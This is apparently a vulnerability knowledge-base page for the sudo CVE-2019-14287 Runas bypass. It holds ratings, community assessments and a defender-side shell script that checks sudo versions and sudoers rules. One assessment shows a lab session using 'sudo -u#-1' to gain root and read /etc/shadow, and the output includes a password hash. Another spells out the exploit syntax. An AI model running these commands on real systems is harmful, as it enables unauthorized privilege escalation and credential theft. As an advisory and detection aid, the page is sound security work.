Attacker Value
Low
(5 users assessed)
Exploitability
Very High
(5 users assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network

CVE-2019-14287

Disclosure Date: October 17, 2019

Description

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.

5
Ratings
Technical Analysis

Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

I’ve seen Runas specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.

More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.

Here’s a contrived example of the bug in action:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: /usr/bin/whoami
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami
ubuntu
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$

You must specify # to use a UID.

Here’s another example where you’re not limited to a command, only the target users:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: ALL
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow
root:*:17897:0:99999:7:::
daemon:*:17897:0:99999:7:::
bin:*:17897:0:99999:7:::
sys:*:17897:0:99999:7:::
sync:*:17897:0:99999:7:::
games:*:17897:0:99999:7:::
man:*:17897:0:99999:7:::
lp:*:17897:0:99999:7:::
mail:*:17897:0:99999:7:::
news:*:17897:0:99999:7:::
uucp:*:17897:0:99999:7:::
proxy:*:17897:0:99999:7:::
www-data:*:17897:0:99999:7:::
backup:*:17897:0:99999:7:::
list:*:17897:0:99999:7:::
irc:*:17897:0:99999:7:::
gnats:*:17897:0:99999:7:::
nobody:*:17897:0:99999:7:::
systemd-timesync:*:17897:0:99999:7:::
systemd-network:*:17897:0:99999:7:::
systemd-resolve:*:17897:0:99999:7:::
systemd-bus-proxy:*:17897:0:99999:7:::
syslog:*:17897:0:99999:7:::
_apt:*:17897:0:99999:7:::
lxd:*:17897:0:99999:7:::
messagebus:*:17897:0:99999:7:::
uuidd:*:17897:0:99999:7:::
dnsmasq:*:17897:0:99999:7:::
sshd:*:17897:0:99999:7:::
pollinate:*:17897:0:99999:7:::
vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7:::
ubuntu:!:18100:0:99999:7:::
vagrant@ubuntu-xenial:~$
3
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Patch, but don’t freak out.

2
Ratings
Technical Analysis

As many others before me have stated, this CVE holds very little use other than in CTF environments.

To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

<user> ALL=(ALL:!root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.

To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
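An added example, not part of any assessment above: a defender-side check in POSIX sh for the two preconditions the assessments describe, a sudo release below 1.8.28 and a Runas spec that grants ALL while negating root. The sudoers text is constructed and the version string is supplied by the caller rather than parsed from sudo -V.

```shell
#!/bin/sh
# Added defender-side check for CVE-2019-14287 (example code, not from the
# AttackerKB assessments). Both preconditions must hold together: sudo older
# than 1.8.28, and a Runas spec that grants ALL while excluding root.

# version_lt A B: exit 0 if sudo version A is strictly lower than B.
# Compares up to three dotted fields; a "pN" patch suffix is ignored.
version_lt() {
    a=$(printf '%s\n' "$1" | cut -d p -f 1)
    b=$(printf '%s\n' "$2" | cut -d p -f 1)
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s\n' "$a" | cut -d . -f "$i"); x=${x:-0}
        y=$(printf '%s\n' "$b" | cut -d . -f "$i"); y=${y:-0}
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
        i=$((i + 1))
    done
    return 1
}

# risky_runas_specs: read sudoers text on stdin, print every active rule whose
# Runas list names ALL and negates root, e.g. "(ALL, !root)" or "(ALL:!root)".
# Comment lines are skipped; Runas_Alias indirection and #include are not followed.
risky_runas_specs() {
    grep -v '^[[:space:]]*#' | grep -E '\(ALL[^)]*![[:space:]]*root' || true
}

# assess VERSION SUDOERS_TEXT: exit 0 (and print the matching rules) only when
# both preconditions hold; otherwise report and exit 1.
assess() {
    specs=$(printf '%s\n' "$2" | risky_runas_specs)
    if version_lt "$1" 1.8.28 && [ -n "$specs" ]; then
        printf 'EXPOSED: sudo %s < 1.8.28 with Runas spec(s):\n%s\n' "$1" "$specs"
        return 0
    fi
    printf 'not exposed: sudo %s\n' "$1"
    return 1
}

# Constructed sample sudoers (not from any real host). Only the vagrant rule
# should match: the commented-out line is skipped, deploy names one non-root user.
SAMPLE_SUDOERS='# ops ALL=(ALL, !root) ALL
Defaults env_reset
root    ALL=(ALL:ALL) ALL
vagrant ALL=(ALL, !root) NOPASSWD: /usr/bin/whoami
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app'

assess 1.8.16 "$SAMPLE_SUDOERS"            # exposed
assess 1.8.28p1 "$SAMPLE_SUDOERS" || true  # fixed release: not exposed
```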
